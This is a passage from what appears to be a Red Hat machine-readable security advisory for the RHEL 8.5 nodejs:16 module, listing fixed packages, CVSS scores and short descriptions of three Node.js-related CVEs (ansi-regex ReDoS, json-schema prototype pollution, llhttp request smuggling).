"AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-3807" }, { "category": "external", "summary": "RHBZ#2007557", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2007557" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-3807", "url": "https://www.cve.org/CVERecord?id=CVE-2021-3807" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-3807", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3807" }, { "category": "external", "summary": "https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994", "url": "https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994" } ], "release_date": "2021-09-17T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-16T17:21:31+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5171" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes" }, { "cve": "CVE-2021-3918", "cwe": { "id": "CWE-915", "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes" }, "discovery_date": "2021-11-13T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2024702" } ], "notes": [ { "category": "description", "text": "The json-schema Node.JS library was vulnerable to prototype pollution during the validation of a JSON object. An attacker, able to provide a specially crafted JSON file for validation, could use this flaw to modify the behavior of the node program, to, for example, execute arbitrary code.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-json-schema: Prototype pollution vulnerability", "title": "Vulnerability summary" }, { "category": "other", "text": "npm versions 8.0.0 and older provide a vulnerable version of the json-schema library. However, it is currently believed that in the context of npm, it is not possible to take advantage of the vulnerability.\n\nRed Hat Enterprise Linux version 8 and Software Collections provide a vulnerable version of the json-schema library only as embedded in the npm package. As a result, the severity of the incident has been lowered for these 2 products.\n\nRed Hat Quay includes json-schema as a development dependency of quay-registry-container. As a result, the impact rating has been lowered to Moderate.\n\nIn Red Hat OpenShift Container Platform (RHOCP), Red Hat Openshift Data Foundations (ODF), Red Hat distributed tracing, Migration Toolkit for Virtualization (MTV) and Red Hat Advanced Cluster Management for Kubernetes (RHACM) the affected components are behind OpenShift OAuth. This restricts access to the vulnerable json-schema library to authenticated users only, therefore the impact is reduced to Moderate.\n\nIn Red Hat Openshift Data Foundations (ODF) the odf4/mcg-core-rhel8 component has \"Will not fix status\", but starting from ODF 4.11 stream this component contains already patched version of the json-schema library. Earlier version of ODF are already under Maintenance Support phase, hence this vulnerability will not be fixed.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-3918" }, { "category": "external", "summary": "RHBZ#2024702", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2024702" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-3918", "url": "https://www.cve.org/CVERecord?id=CVE-2021-3918" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-3918", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3918" } ], "release_date": "2021-10-03T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-16T17:21:31+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5171" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-json-schema: Prototype pollution vulnerability" }, { "cve": "CVE-2021-22959", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2021-10-14T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2014057" } ], "notes": [ { "category": "description", "text": "An HTTP Request Smuggling (HRS) vulnerability was found in the llhttp library, used by Node.JS. Spaces as part of the header names were accepted as valid. In situations where HTTP conversations are being proxied (such as proxy, reverse-proxy, load-balancer), an attacker can use this flaw to inject arbitrary messages through the proxy. The highest threat from this vulnerability is to confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "llhttp: HTTP Request Smuggling due to spaces in headers", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Quay from version 3.4 consumes nodejs from RHEL, so security tracking is provided by the container health index on the customer portal [1]. Additionally there is no impact from this issue on Quay 3.3 and 3.2 because nodejs is only used at build time and is no longer shipped, starting with Quay 3.5 [2].\n[1] https://catalog.redhat.com/software/containers/quay/quay-rhel8/600e03aadd19c7786c43ae49?container-tabs=security\n[2] https://issues.redhat.com/browse/PROJQUAY-1409\nTherefore Quay component is marked as \"Will not fix\".", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", 